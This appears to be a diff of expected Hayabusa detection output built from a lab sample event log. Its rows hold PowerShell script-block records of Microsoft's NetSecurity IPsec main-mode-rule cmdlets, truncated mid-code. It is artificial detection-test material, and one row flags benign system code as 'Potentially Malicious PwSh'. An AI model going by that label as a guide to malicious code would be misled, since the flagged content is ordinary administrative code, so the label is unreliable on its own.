[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Polic",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"alue = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Polic",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"yStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' -Alias '*' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', 